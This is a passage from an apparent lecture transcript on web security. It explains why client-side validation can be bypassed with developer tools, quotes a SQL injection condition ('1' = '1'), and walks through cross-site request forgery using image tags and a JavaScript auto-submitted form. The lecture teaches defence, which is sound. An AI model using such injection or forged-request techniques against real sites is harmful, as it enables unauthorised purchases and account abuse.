a feature called developer tools. 1204 01:03:23,652 --> 01:03:26,110 And indeed, if you've done any web development of your own, 1205 01:03:26,110 --> 01:03:27,540 you might have played with this feature. 1206 01:03:27,540 --> 01:03:30,748 And these developer tools, which might be called something slightly different 1207 01:03:30,748 --> 01:03:33,750 across different browsers, allow you to poke around 1208 01:03:33,750 --> 01:03:38,760 the HTML, the CSS, and the JavaScript that compose some web page either 1209 01:03:38,760 --> 01:03:41,310 that you yourself have made or that someone else has made 1210 01:03:41,310 --> 01:03:44,340 and you have downloaded or accessed via your own browser. 1211 01:03:44,340 --> 01:03:49,020 Let's consider now, though, what you can do if you have access 1212 01:03:49,020 --> 01:03:50,680 to these developer tools. 1213 01:03:50,680 --> 01:03:53,490 So, for instance, here is some HTML using 1214 01:03:53,490 --> 01:03:57,310 a tag called input, which would create a checkbox on a website. 1215 01:03:57,310 --> 01:04:01,000 We haven't seen this one yet, but it's similar in spirit to the paragraph tag 1216 01:04:01,000 --> 01:04:05,320 and the anchor tag, in which case it is interpreted as the browser as meaning, 1217 01:04:05,320 --> 01:04:07,208 hey, browser, here comes a checkbox. 1218 01:04:07,208 --> 01:04:09,250 The only thing different that's worth noting here 1219 01:04:09,250 --> 01:04:13,270 is that some HTML tags don't actually need a close tag, 1220 01:04:13,270 --> 01:04:16,240 because whereas a paragraph starts somewhere 1221 01:04:16,240 --> 01:04:19,450 and then ends somewhere else after some number of words, 1222 01:04:19,450 --> 01:04:22,010 a checkbox is either there or it isn't there, 1223 01:04:22,010 --> 01:04:25,480 so there's really no conceptual notion of it starting and stopping. 1224 01:04:25,480 --> 01:04:29,380 So some HTML tags don't even need end tags or close tags. 1225 01:04:29,380 --> 01:04:31,010 This, then, is one of them. 1226 01:04:31,010 --> 01:04:35,350 This, then, is an input tag that gives us a type of input, namely, a checkbox. 1227 01:04:35,350 --> 01:04:40,630 And another curiosity about this is that some HTML attributes don't need values. 1228 01:04:40,630 --> 01:04:44,870 We saw the href attribute for the anchor tag earlier, and that, of course, 1229 01:04:44,870 --> 01:04:45,550 had a value. 1230 01:04:45,550 --> 01:04:48,280 In quotes was the URL that you want to link to. 1231 01:04:48,280 --> 01:04:50,980 Here, we see that same paradigm-- type equals, quote unquote, 1232 01:04:50,980 --> 01:04:55,090 checkbox to give us specifically a checkbox type of input. 1233 01:04:55,090 --> 01:04:59,170 But you'll also notice here another attribute specifically for this input 1234 01:04:59,170 --> 01:05:01,240 tag that's literally called disabled. 1235 01:05:01,240 --> 01:05:04,570 And strictly speaking, you don't need to give it a value, 1236 01:05:04,570 --> 01:05:06,590 because it's either there or it isn't. 1237 01:05:06,590 --> 01:05:09,970 And if it is there, that just means that this checkbox is exactly 1238 01:05:09,970 --> 01:05:13,720 that, disabled, which means you can see it, but it's not checked, 1239 01:05:13,720 --> 01:05:15,550 and you can't actually check it. 1240 01:05:15,550 --> 01:05:19,180 It's disabled and lightly grayed out, typically, on a browser. 1241 01:05:19,180 --> 01:05:20,612 So why might this be? 1242 01:05:20,612 --> 01:05:22,570 Well, maybe there's some feature in the browser 1243 01:05:22,570 --> 01:05:25,150 that you don't want to give some users access to. 1244 01:05:25,150 --> 01:05:28,240 Maybe based on who has logged in, they should or should not 1245 01:05:28,240 --> 01:05:30,040 have access to some feature. 1246 01:05:30,040 --> 01:05:34,480 The problem, though, with HTML and CSS and JavaScript 1247 01:05:34,480 --> 01:05:38,410 or really anything that is web based or using those languages 1248 01:05:38,410 --> 01:05:44,590 is that you're sending this HTML to the user's own device, 1249 01:05:44,590 --> 01:05:48,490 to their browser on their phone or laptop or desktop, 1250 01:05:48,490 --> 01:05:53,860 which means they can not only see this HTML code, but theoretically, 1251 01:05:53,860 --> 01:05:54,820 they can edit it. 1252 01:05:54,820 --> 01:05:58,660 They can't edit it on the server, because that's your own copy, assuming 1253 01:05:58,660 --> 01:06:00,100 they can't hack into the server. 1254 01:06:00,100 --> 01:06:02,900 But they can edit their own copy thereof. 1255 01:06:02,900 --> 01:06:04,762 Now, usually, that's not such a big deal, 1256 01:06:04,762 --> 01:06:06,470 because what's the worst that can happen? 1257 01:06:06,470 --> 01:06:11,260 They can hack themselves by changing HTML on their own computer or phone. 1258 01:06:11,260 --> 01:06:15,940 But it is problematic if you are using HTML or even 1259 01:06:15,940 --> 01:06:21,040 JavaScript to try to prevent certain user interactions with your server. 1260 01:06:21,040 --> 01:06:24,070 So, for instance, if you simply don't want a user 1261 01:06:24,070 --> 01:06:27,700 to be able to check this box so that when they submit a form, 1262 01:06:27,700 --> 01:06:30,580 they're not agreeing to something, or they're adding something 1263 01:06:30,580 --> 01:06:33,820 to their shopping cart by using this checkbox, 1264 01:06:33,820 --> 01:06:37,420 well, you might rely therefore on this HTML attribute, disabled. 1265 01:06:37,420 --> 01:06:42,100 Just prevent them on the client, in the browser, from checking this box. 1266 01:06:42,100 --> 01:06:44,770 But it turns out, with developer tools, which 1267 01:06:44,770 --> 01:06:47,980 are accessible usually via menu at the top of the screen 1268 01:06:47,980 --> 01:06:50,770 or by right-clicking or Control-clicking on a web page 1269 01:06:50,770 --> 01:06:55,450 and then selecting an option, a user with access to HTML 1270 01:06:55,450 --> 01:06:59,290 can change any and all of that HTML on their own computer, which 1271 01:06:59,290 --> 01:07:02,290 means they could just remove this disabled attribute put 1272 01:07:02,290 --> 01:07:05,020 in their own copy of your HTML on their computer 1273 01:07:05,020 --> 01:07:09,250 and effectively enable that checkbox by getting rid of it. 1274 01:07:09,250 --> 01:07:10,580 Now, what does this mean? 1275 01:07:10,580 --> 01:07:12,490 Well, there's no problem yet. 1276 01:07:12,490 --> 01:07:16,690 But if they do now check that checkbox, and you didn't want them to be able to, 1277 01:07:16,690 --> 01:07:19,480 and they submit the checkbox to the server, 1278 01:07:19,480 --> 01:07:24,130 as by clicking a submit button in a web form, you on the server, 1279 01:07:24,130 --> 01:07:27,970 if you're not paranoid enough, might just 1280 01:07:27,970 --> 01:07:31,750 trust that if I see a checked box being submitted via form, 1281 01:07:31,750 --> 01:07:35,260 they must have been allowed to do it, so I will trust them, but no. 1282 01:07:35,260 --> 01:07:39,440 Here, too, is an example of where you should never trust user's input, 1283 01:07:39,440 --> 01:07:42,670 because if you're trying to disable them from doing something on the client, 1284 01:07:42,670 --> 01:07:44,410 they don't have to respect that. 1285 01:07:44,410 --> 01:07:48,730 They can override the HTML in their own browser, remove any such defenses, 1286 01:07:48,730 --> 01:07:51,130 and then send the checkbox to you anyway. 1287 01:07:51,130 --> 01:07:54,250 The takeaway here then is that you really should never 1288 01:07:54,250 --> 01:07:57,280 rely on client-side validation alone. 1289 01:07:57,280 --> 01:07:59,450 And this disabled attribute is just one more 1290 01:07:59,450 --> 01:08:03,080 minor incarnation of that, where you're relying on the client 1291 01:08:03,080 --> 01:08:07,400 to ensure that the checkbox is disabled, and its value 1292 01:08:07,400 --> 01:08:09,350 can't be sent to the server. 1293 01:08:09,350 --> 01:08:12,980 But client-side validation is really on the honor system 1294 01:08:12,980 --> 01:08:15,950 only, because if someone knows how to use these developer tools 1295 01:08:15,950 --> 01:08:20,149 and removes the disabled attribute, or if they know how to use developer tools 1296 01:08:20,149 --> 01:08:25,220 and maybe disable JavaScript altogether for your website on their computer, 1297 01:08:25,220 --> 01:08:29,689 any form of client-side validation in HTML or JavaScript 1298 01:08:29,689 --> 01:08:33,380 that you wrote on the server but that your server sent to their browser 1299 01:08:33,380 --> 01:08:36,200 and that's therefore executed by their browser 1300 01:08:36,200 --> 01:08:39,270 is vulnerable to simply being turned off. 1301 01:08:39,270 --> 01:08:42,200 So the catch is that even though client-side validation tends 1302 01:08:42,200 --> 01:08:44,870 to be nice in terms of user experience-- the button 1303 01:08:44,870 --> 01:08:47,930 is obviously disabled, so I should not be able to click on it. 1304 01:08:47,930 --> 01:08:50,750 Or my email address is improperly formatted, 1305 01:08:50,750 --> 01:08:52,819 so I should not be allowed to submit the form. 1306 01:08:52,819 --> 01:08:56,689 Any forms of client-side validation tend to give the user immediate 1307 01:08:56,689 --> 01:08:59,420 and often very useful visual feedback. 1308 01:08:59,420 --> 01:09:02,510 But if it's not accompanied, this client-side validation, 1309 01:09:02,510 --> 01:09:06,140 by server-side validation, your server software 1310 01:09:06,140 --> 01:09:09,180 is still vulnerable to attack in some way. 1311 01:09:09,180 --> 01:09:12,979 So what else might-- what other form might this take? 1312 01:09:12,979 --> 01:09:16,370 Well, here's another example of an HTML input. 1313 01:09:16,370 --> 01:09:19,970 This time, it's of type text, which means that the text box on the field. 1314 01:09:19,970 --> 01:09:23,930 Suppose that you really want them to provide that value. 1315 01:09:23,930 --> 01:09:26,210 Maybe this text box represents the user's name 1316 01:09:26,210 --> 01:09:29,340 or their email address or their password or something like that. 1317 01:09:29,340 --> 01:09:32,300 And so if you know a little bit of HTML, you 1318 01:09:32,300 --> 01:09:35,029 know that there's not only a disabled attribute available to you, 1319 01:09:35,029 --> 01:09:36,547 but also a required attribute. 1320 01:09:36,547 --> 01:09:38,630 And it doesn't have an equal sign or a quote mark. 1321 01:09:38,630 --> 01:09:39,529 You don't need that. 1322 01:09:39,529 --> 01:09:42,260 It suffices just to say this input is required. 1323 01:09:42,260 --> 01:09:45,670 But the catch here is, too, if a user doesn't want to give you a name, 1324 01:09:45,670 --> 01:09:47,420 doesn't want to give you an email address, 1325 01:09:47,420 --> 01:09:50,060 doesn't want to give you a password or some other value, 1326 01:09:50,060 --> 01:09:52,279 well, they can use these so-called developer tools, 1327 01:09:52,279 --> 01:09:55,700 click a button on their browser, remove the required attribute, 1328 01:09:55,700 --> 01:09:59,447 and, voila, now they do not need to submit that value. 1329 01:09:59,447 --> 01:10:01,280 Now, that in and of itself is not a problem, 1330 01:10:01,280 --> 01:10:03,322 because again, they're only "hacking themselves." 1331 01:10:03,322 --> 01:10:07,310 But if they're then allowed to submit this form to your server, 1332 01:10:07,310 --> 01:10:12,680 and your server just trusts or assumes that every user will send you 1333 01:10:12,680 --> 01:10:16,010 a username, an email address, a password, or the like, 1334 01:10:16,010 --> 01:10:21,050 that's where things can break, if you're trusting client-side validation alone 1335 01:10:21,050 --> 01:10:25,500 to ensure that the user's input is as expected. 1336 01:10:25,500 --> 01:10:27,950 So if they're allowed to get rid of something 1337 01:10:27,950 --> 01:10:31,430 as simple as this required attribute, effectively making the input like this, 1338 01:10:31,430 --> 01:10:33,420 you might be missing some value. 1339 01:10:33,420 --> 01:10:38,270 And so you must therefore use server-side validation again. 1340 01:10:38,270 --> 01:10:40,133 And we won't get into the particulars of how 1341 01:10:40,133 --> 01:10:42,050 you do this, because it will completely depend 1342 01:10:42,050 --> 01:10:45,380 on the type of server software you're using, the programming language 1343 01:10:45,380 --> 01:10:46,160 that you're using. 1344 01:10:46,160 --> 01:10:49,760 And so it's really the principle today that's important that client-side 1345 01:10:49,760 --> 01:10:54,470 validation, whereby the browser or the user's own copy of your software tries 1346 01:10:54,470 --> 01:10:58,910 to preempt mistakes and require or disable certain inputs-- 1347 01:10:58,910 --> 01:10:59,720 that's fine. 1348 01:10:59,720 --> 01:11:03,740 That tends to give good, immediate, useful user feedback. 1349 01:11:03,740 --> 01:11:09,330 But it must still be always accompanied by server-side validation 1350 01:11:09,330 --> 01:11:15,110 so that you have the final say over what the user input looks like 1351 01:11:15,110 --> 01:11:19,100 and if and how it's actually stored into your system. 1352 01:11:19,100 --> 01:11:21,920 Again, the particulars of how you do one or the other 1353 01:11:21,920 --> 01:11:26,570 is the topic for an actual programming class or a class on web development 1354 01:11:26,570 --> 01:11:27,450 specifically. 1355 01:11:27,450 --> 01:11:29,030 But for now, it's this principle. 1356 01:11:29,030 --> 01:11:31,490 Just because you have client-side validation 1357 01:11:31,490 --> 01:11:34,928 doesn't mean you shouldn't also have server-side validation. 1358 01:11:34,928 --> 01:11:37,220 And, in fact, if you've got to choose one or the other, 1359 01:11:37,220 --> 01:11:39,740 always choose server-side validation. 1360 01:11:39,740 --> 01:11:43,160 Client-side validation is really just icing on the cake. 1361 01:11:43,160 --> 01:11:47,480 It adds to the experience, but it's not the prerequisite one. 1362 01:11:47,480 --> 01:11:51,320 Questions, then, on these so-called developer tools 1363 01:11:51,320 --> 01:11:57,410 or these kinds of threats when it comes to validating the user's input? 1364 01:11:57,410 --> 01:12:00,020 AUDIENCE: Yeah, so my question is more related to SQL 1365 01:12:00,020 --> 01:12:01,580 and command injections for a second. 1366 01:12:01,580 --> 01:12:07,310 Isn't it really easy to just not run the user's commands with admin or root 1367 01:12:07,310 --> 01:12:10,270 privileges to delete certain records from a database or something? 1368 01:12:10,270 --> 01:12:12,020 DAVID J. MALAN: Yes, another defense would 1369 01:12:12,020 --> 01:12:14,420 be to make sure that whatever username you're 1370 01:12:14,420 --> 01:12:18,920 using to execute these SQL commands does not have the ability to delete anything 1371 01:12:18,920 --> 01:12:19,620 at all. 1372 01:12:19,620 --> 01:12:23,480 However, some threats only need select access. 1373 01:12:23,480 --> 01:12:26,930 So the second example I showed you, whereby we tricked the database 1374 01:12:26,930 --> 01:12:30,440 into just selecting * from users WHERE '1' = '1'-- 1375 01:12:30,440 --> 01:12:33,890 that was an example of one where, permission-wise, it probably 1376 01:12:33,890 --> 01:12:37,040 would work, and it might allow the adversary still to log in. 1377 01:12:37,040 --> 01:12:41,460 But your suggestion is a good one as an additional defense, not an alternative. 1378 01:12:41,460 --> 01:12:45,650 Let's consider another class of attack to which your code might be vulnerable 1379 01:12:45,650 --> 01:12:48,860 if it's on a server using the same language, HTML-- 1380 01:12:48,860 --> 01:12:52,190 namely, Cross-Site Request Forgeries, or CSRFs. 1381 01:12:52,190 --> 01:12:54,980 So this one's more of a mouthful, but it too 1382 01:12:54,980 --> 01:12:59,700 relates to a mistake you might otherwise make when writing software on a server 1383 01:12:59,700 --> 01:13:02,190 if you're not already familiar with this kind of threat 1384 01:13:02,190 --> 01:13:07,350 So first, HTTP, recall, is this protocol, this convention by which 1385 01:13:07,350 --> 01:13:09,240 web browsers and servers communicate. 1386 01:13:09,240 --> 01:13:12,780 Well, it turns out there's different ways that browsers can get information 1387 01:13:12,780 --> 01:13:13,720 to a server. 1388 01:13:13,720 --> 01:13:17,070 And one of those ways is literally called GET by convention. 1389 01:13:17,070 --> 01:13:19,470 In other words, inside of that virtual envelope 1390 01:13:19,470 --> 01:13:24,360 is typically literally this word, GET, followed by the file name 1391 01:13:24,360 --> 01:13:26,370 that the browser wants to get from a server. 1392 01:13:26,370 --> 01:13:28,560 But more importantly for our purposes is that 1393 01:13:28,560 --> 01:13:31,890 whenever using this GET method to send information 1394 01:13:31,890 --> 01:13:36,510 to a server, all of the information that you want to get is embedded in the URL 1395 01:13:36,510 --> 01:13:37,510 itself. 1396 01:13:37,510 --> 01:13:38,530 So what does that mean? 1397 01:13:38,530 --> 01:13:41,310 Well, consider, for instance, this sample link in HTML. 1398 01:13:41,310 --> 01:13:43,020 Here's my anchor tag beginning. 1399 01:13:43,020 --> 01:13:44,700 Here's my anchor tag ending. 1400 01:13:44,700 --> 01:13:47,490 Notice here is the text "By Now." 1401 01:13:47,490 --> 01:13:50,190 Well, let's suppose that you're in the US here. 1402 01:13:50,190 --> 01:13:52,380 And on amazon.com in the US, there's actually 1403 01:13:52,380 --> 01:13:54,780 this feature where you can "buy now." 1404 01:13:54,780 --> 01:13:58,290 That is to say, when you visit the page of a product on Amazon's website 1405 01:13:58,290 --> 01:14:02,080 in the US, if not beyond, you can skip the steps 1406 01:14:02,080 --> 01:14:04,300 of having to add an item to your shopping cart 1407 01:14:04,300 --> 01:14:06,733 and check out and choose your payment method 1408 01:14:06,733 --> 01:14:09,400 and then, some number of clicks later, actually buy the product. 1409 01:14:09,400 --> 01:14:12,370 Rather, if you configure your account in advance, 1410 01:14:12,370 --> 01:14:15,940 you can go to any product's page, literally click a link or a button 1411 01:14:15,940 --> 01:14:18,100 that says "Buy Now," and that's it. 1412 01:14:18,100 --> 01:14:20,140 In a single click, for better or for worse, 1413 01:14:20,140 --> 01:14:22,610 that product will be shipped to your home. 1414 01:14:22,610 --> 01:14:24,537 So how might Amazon be implementing this? 1415 01:14:24,537 --> 01:14:26,620 Well, they might indeed be using a link like this, 1416 01:14:26,620 --> 01:14:38,560 the href value of which is a URL, like https://www.amazon.com/dp/B07XLQ2FSK. 1417 01:14:38,560 --> 01:14:44,110 In other words, that seems to be enough information in the URL alone 1418 01:14:44,110 --> 01:14:47,560 via which to buy the product whose unique identifier is apparently 1419 01:14:47,560 --> 01:14:49,317 that string of text at the end. 1420 01:14:49,317 --> 01:14:51,400 Now, that's all fine and good, and that's actually 1421 01:14:51,400 --> 01:14:56,320 seems very user friendly, because with a single click on Buy Now, 1422 01:14:56,320 --> 01:14:58,270 I can indeed buy that product. 1423 01:14:58,270 --> 01:15:02,140 But the danger here is that if this link is not just 1424 01:15:02,140 --> 01:15:05,890 on amazon.com but is in some adversary's website 1425 01:15:05,890 --> 01:15:08,530 or maybe in an email that is sent to you. 1426 01:15:08,530 --> 01:15:14,140 If it's that easy to buy something now, you could trick someone, potentially, 1427 01:15:14,140 --> 01:15:17,830 into buying things that they didn't actually intend in this case, 1428 01:15:17,830 --> 01:15:21,340 or doing anything else on a web server into which they're already 1429 01:15:21,340 --> 01:15:26,900 logged in if GET is the method being used to get something from that server. 1430 01:15:26,900 --> 01:15:31,220 Well, why is this, exactly, that this URL is problematic? 1431 01:15:31,220 --> 01:15:34,900 Well, consider, for instance, the following HTML instead. 1432 01:15:34,900 --> 01:15:37,630 Suppose that you visit an adversary site who 1433 01:15:37,630 --> 01:15:42,430 just likes to create havoc in the world, and that adversary site doesn't even 1434 01:15:42,430 --> 01:15:45,670 have an anchor tag or a link that they want you to trick. 1435 01:15:45,670 --> 01:15:48,820 So it's not even as deliberate as a phishing attack 1436 01:15:48,820 --> 01:15:50,470 that they want you to click some link. 1437 01:15:50,470 --> 01:15:55,420 Suppose they're using something like an image tag, which it turns out in HTML, 1438 01:15:55,420 --> 01:15:58,630 img for short, is how you embed an image on a web page. 1439 01:15:58,630 --> 01:16:00,280 And how do you specify what image? 1440 01:16:00,280 --> 01:16:04,390 You specify the source thereof, src for short, the value of which 1441 01:16:04,390 --> 01:16:08,470 can be the URL of or the name of the image you want to display. 1442 01:16:08,470 --> 01:16:13,630 But strictly speaking, that URL doesn't have to actually lead to an image. 1443 01:16:13,630 --> 01:16:17,080 It could actually lead to an Amazon product page. 1444 01:16:17,080 --> 01:16:19,540 But the way images work on web pages, recall, 1445 01:16:19,540 --> 01:16:23,830 is that, typically, when you visit a web page, the images automatically load. 1446 01:16:23,830 --> 01:16:27,280 You don't have to click or do anything, typically, for the images 1447 01:16:27,280 --> 01:16:29,277 to appear on a web page-- maybe in emails, 1448 01:16:29,277 --> 01:16:30,860 and that's an anti-phishing mechanism. 1449 01:16:30,860 --> 01:16:34,000 But in web pages, you typically don't have to click on anything 1450 01:16:34,000 --> 01:16:35,050 to see the images. 1451 01:16:35,050 --> 01:16:37,840 That is to say, the value of the source attributes 1452 01:16:37,840 --> 01:16:41,540 are just automatically downloaded and displayed to the user. 1453 01:16:41,540 --> 01:16:44,740 Now, this, in fairness, is not an image. 1454 01:16:44,740 --> 01:16:48,680 But the browser doesn't necessarily know that from the get-go. 1455 01:16:48,680 --> 01:16:53,680 And so if this HTML is in some adversary's website that you've somehow 1456 01:16:53,680 --> 01:16:56,410 been tricked into visiting, and you don't even click a link-- 1457 01:16:56,410 --> 01:16:58,180 you just visit that web page-- 1458 01:16:58,180 --> 01:17:01,442 that means this image tag is going to try to download this source. 1459 01:17:01,442 --> 01:17:03,400 And even though it's not going to get an image, 1460 01:17:03,400 --> 01:17:06,770 it is going to buy that product for you. 1461 01:17:06,770 --> 01:17:07,480 Why? 1462 01:17:07,480 --> 01:17:10,210 Because if you're logged into your Amazon account, 1463 01:17:10,210 --> 01:17:15,130 even though this is in another tab, it's as though your browser requested 1464 01:17:15,130 --> 01:17:18,670 that URL via that "GET" method because all 1465 01:17:18,670 --> 01:17:24,100 of the relevant information for buying that product is in the URL alone. 1466 01:17:24,100 --> 01:17:27,460 So it turns out that using GET is actually 1467 01:17:27,460 --> 01:17:32,260 not a good thing when it comes to changing state on the server. 1468 01:17:32,260 --> 01:17:35,590 To get technical, the GET method is meant to be "safe," 1469 01:17:35,590 --> 01:17:41,660 safe whereby it does not change any state or values on the server. 1470 01:17:41,660 --> 01:17:44,290 So it would actually be incorrect, or definitely 1471 01:17:44,290 --> 01:17:48,160 bad practice by Amazon, if they were implementing their Buy Now 1472 01:17:48,160 --> 01:17:53,680 button simply with a simple URL and a simple GET request. 1473 01:17:53,680 --> 01:17:58,360 It should not be that easy to buy things on the internet, let alone change state 1474 01:17:58,360 --> 01:17:59,890 on a server in other ways. 1475 01:17:59,890 --> 01:18:02,520 So there are, thankfully, other methods, but even 1476 01:18:02,520 --> 01:18:05,070 these are potentially vulnerable to this kind of attack. 1477 01:18:05,070 --> 01:18:06,960 There's a POST method, which is typically 1478 01:18:06,960 --> 01:18:11,400 used by browsers when you want to post your credit card information 1479 01:18:11,400 --> 01:18:12,900 or your password to a server. 1480 01:18:12,900 --> 01:18:15,900 You don't want your credit card-- you don't want your password typically 1481 01:18:15,900 --> 01:18:19,980 ending up in the URL of your browser for privacy's sake. 1482 01:18:19,980 --> 01:18:22,500 So rather, POST will kind of hide it more deeply 1483 01:18:22,500 --> 01:18:24,930 in that virtual envelope to which we keep alluding. 1484 01:18:24,930 --> 01:18:28,470 POST might also be used if you want to upload images or video files 1485 01:18:28,470 --> 01:18:31,920 to a server because those don't really fit in URLs, it would seem. 1486 01:18:31,920 --> 01:18:37,230 And so POST is an alternative that is meant to change state on the server, 1487 01:18:37,230 --> 01:18:39,580 for instance, buy products for you. 1488 01:18:39,580 --> 01:18:41,430 But even this can perhaps be abused. 1489 01:18:41,430 --> 01:18:43,020 Well, let's take a look how. 1490 01:18:43,020 --> 01:18:46,500 Here is now some HTML-- and it's more HTML than we've seen thus far, 1491 01:18:46,500 --> 01:18:49,200 but we'll wrap our minds around each piece of it-- 1492 01:18:49,200 --> 01:18:53,370 that represents an alternative implementation 1493 01:18:53,370 --> 01:18:56,280 of the Buy Now button on Amazon that's no longer 1494 01:18:56,280 --> 01:19:01,200 a simple anchor tag with everything that's needed in the URL. 1495 01:19:01,200 --> 01:19:03,510 This is more of a traditional web form. 1496 01:19:03,510 --> 01:19:06,510 And it's fine if the form is super short and only has a single button. 1497 01:19:06,510 --> 01:19:08,740 It doesn't need text fields or anything like that. 1498 01:19:08,740 --> 01:19:10,150 But there's a lot going on here. 1499 01:19:10,150 --> 01:19:10,990 So let's see. 1500 01:19:10,990 --> 01:19:13,800 So here's the form tag, the opening tag. 1501 01:19:13,800 --> 01:19:14,940 Here's the close tag. 1502 01:19:14,940 --> 01:19:17,520 So everything in between must be implementing this form. 1503 01:19:17,520 --> 01:19:20,190 The action of this form, I claim, is going 1504 01:19:20,190 --> 01:19:24,480 to be to submit the information to this amazon.com URL here. 1505 01:19:24,480 --> 01:19:27,450 But the method that we're going to use is explicitly POST. 1506 01:19:27,450 --> 01:19:30,420 So it turns out, in an HTML form, if you don't specify a method, 1507 01:19:30,420 --> 01:19:32,940 it will use GET by default. So explicitly, I'm 1508 01:19:32,940 --> 01:19:36,720 at least using POST because I don't want everything to be in the URL alone. 1509 01:19:36,720 --> 01:19:39,210 Well, I've got two inputs here, one of which 1510 01:19:39,210 --> 01:19:42,700 is of type hidden Well, what's going on here? 1511 01:19:42,700 --> 01:19:45,000 Well, it turns out that, in HTML forms, you 1512 01:19:45,000 --> 01:19:48,370 can create key-value pairs to send input to a server. 1513 01:19:48,370 --> 01:19:53,670 So if you recall previously, I used the "dp" part of the URL 1514 01:19:53,670 --> 01:19:56,850 as separating amazon.com from the product ID. 1515 01:19:56,850 --> 01:19:59,850 And here-- and now I'm making this up for the sake of discussion-- 1516 01:19:59,850 --> 01:20:05,280 I'm supposing that Amazon supports a web form name called 1517 01:20:05,280 --> 01:20:10,230 dp whose type is hidden because the user doesn't need to see this, 1518 01:20:10,230 --> 01:20:12,970 but the value is that same product ID. 1519 01:20:12,970 --> 01:20:16,920 So this is an alternative to embedding that product ID in the URL. 1520 01:20:16,920 --> 01:20:23,428 Instead, I'm saying there's an HTTP parameter called dp, the value of which 1521 01:20:23,428 --> 01:20:23,970 will be this. 1522 01:20:23,970 --> 01:20:25,678 But it's hidden, so the user doesn't even 1523 01:20:25,678 --> 01:20:29,610 see it, which is fine, because the whole point is a nice, simple Buy Now button. 1524 01:20:29,610 --> 01:20:30,750 How do we get that button? 1525 01:20:30,750 --> 01:20:33,328 We use a button tag in HTML, the type of which 1526 01:20:33,328 --> 01:20:36,120 is just submit, because its purpose in life is to submit this form. 1527 01:20:36,120 --> 01:20:40,290 And the text that the user sees for this button is indeed "Buy Now." 1528 01:20:40,290 --> 01:20:41,340 So what am I doing? 1529 01:20:41,340 --> 01:20:43,620 This will make more sense, admittedly, to those of you 1530 01:20:43,620 --> 01:20:45,787 who've already studied a bit of web development, who 1531 01:20:45,787 --> 01:20:47,130 have written HTML yourself. 1532 01:20:47,130 --> 01:20:51,900 But I'm essentially making it harder for an adversary 1533 01:20:51,900 --> 01:20:56,320 to automate an attack on a user's Amazon account. 1534 01:20:56,320 --> 01:20:56,880 Why? 1535 01:20:56,880 --> 01:21:01,230 Because I am not just using a link anymore 1536 01:21:01,230 --> 01:21:06,630 that the user might click or a URL that could be subtly hidden in an image tag. 1537 01:21:06,630 --> 01:21:08,910 Now I have an actual web form. 1538 01:21:08,910 --> 01:21:12,660 And at least based on my naive understanding of HTML 1539 01:21:12,660 --> 01:21:15,510 at the moment in this story, this would seem 1540 01:21:15,510 --> 01:21:18,330 to require that a human click an actual button. 1541 01:21:18,330 --> 01:21:22,120 Like, I cannot use this as the source of an image. 1542 01:21:22,120 --> 01:21:23,010 It's not a URL. 1543 01:21:23,010 --> 01:21:24,670 It's all of this complexity. 1544 01:21:24,670 --> 01:21:27,120 So if you're familiar with GET versus POST, 1545 01:21:27,120 --> 01:21:29,610 you might be inclined to think that, OK, POST surely 1546 01:21:29,610 --> 01:21:34,260 solves the problem by using this web form because you make sure in this way 1547 01:21:34,260 --> 01:21:37,920 that someone clicks the button before they can buy anything. 1548 01:21:37,920 --> 01:21:41,190 Now, why is that indeed naive? 1549 01:21:41,190 --> 01:21:44,460 Well, it turns out using not just HTML but this language 1550 01:21:44,460 --> 01:21:48,150 we've seen a little bit of today, namely, JavaScript, can 1551 01:21:48,150 --> 01:21:52,210 be used to automate the process of submitting a form. 1552 01:21:52,210 --> 01:21:56,790 So if an adversary now has this HTML in their website, 1553 01:21:56,790 --> 01:21:59,010 they don't have to wait and hope that someone 1554 01:21:59,010 --> 01:22:03,060 like you or me is going to come along and click the button explicitly, 1555 01:22:03,060 --> 01:22:05,700 because that would be a little weird to click a button thinking 1556 01:22:05,700 --> 01:22:08,880 you're going to buy something now, but it's not on the actual amazon.com. 1557 01:22:08,880 --> 01:22:10,350 That alone doesn't matter. 1558 01:22:10,350 --> 01:22:14,190 If the adversary can just trick you into visiting their website, 1559 01:22:14,190 --> 01:22:20,250 and their website contains this HTML and this additional JavaScript, 1560 01:22:20,250 --> 01:22:23,850 they can immediately submit this form for you 1561 01:22:23,850 --> 01:22:26,820 to Amazon without you clicking a thing. 1562 01:22:26,820 --> 01:22:27,360 Why? 1563 01:22:27,360 --> 01:22:30,880 Well, inside of this script tag that I've added down below, 1564 01:22:30,880 --> 01:22:33,810 I've simply said, document.forms[0]. 1565 01:22:33,810 --> 01:22:36,600 So this means get me the first form on the page-- 1566 01:22:36,600 --> 01:22:38,730 and I'm presuming there's only one in this story-- 1567 01:22:38,730 --> 01:22:40,240 and then submit it. 1568 01:22:40,240 --> 01:22:43,170 So this is to say, in JavaScript, not only can you 1569 01:22:43,170 --> 01:22:46,620 do things like trigger alerts on the screen, those dialog windows. 1570 01:22:46,620 --> 01:22:51,270 You can similarly, through code, automatically submit forms. 1571 01:22:51,270 --> 01:22:53,460 So it doesn't matter that you're using POST. 1572 01:22:53,460 --> 01:22:56,850 It doesn't matter that you have an actual button that must be clicked. 1573 01:22:56,850 --> 01:22:59,100 It doesn't have to be a human that clicks that button. 1574 01:22:59,100 --> 01:23:03,180 It can be their browser automatically executing this JavaScript code 1575 01:23:03,180 --> 01:23:07,600 in the adversary's website that just submits that form for them. 1576 01:23:07,600 --> 01:23:12,510 So this is the essence now of a cross-site request forgery. 1577 01:23:12,510 --> 01:23:16,080 If HTML like this exists in the adversary's 1578 01:23:16,080 --> 01:23:19,740 website, some other website, you can nonetheless 1579 01:23:19,740 --> 01:23:24,600 trick users into executing operations across websites, 1580 01:23:24,600 --> 01:23:28,170 on amazon.com in this case, even though the users themselves 1581 01:23:28,170 --> 01:23:29,970 are not on amazon.com. 1582 01:23:29,970 --> 01:23:33,450 So that's the cross-site aspect of these attacks. 1583 01:23:33,450 --> 01:23:36,960 And it's a request forgery in the sense that it's 1584 01:23:36,960 --> 01:23:40,380 sending all of the right information, but it's forged by the adversary. 1585 01:23:40,380 --> 01:23:44,190 It's not coming from the amazon.com developers themselves. 1586 01:23:44,190 --> 01:23:48,300 But it is this simple, because if Amazon does not defend against this attack, 1587 01:23:48,300 --> 01:23:51,390 there is nothing stopping you or me or any adversary 1588 01:23:51,390 --> 01:23:54,390 from including code like this on our websites, 1589 01:23:54,390 --> 01:23:57,060 somehow tricking users into visiting our websites, 1590 01:23:57,060 --> 01:24:01,860 and, boom, having products sent to them automatically-- assuming they have 1591 01:24:01,860 --> 01:24:06,330 an amazon.com account, and they're already logged into it in another tab, 1592 01:24:06,330 --> 01:24:10,210 or at least earlier in the day, for instance. 1593 01:24:10,210 --> 01:24:14,040 All right, any questions now on this particular attack, 1594 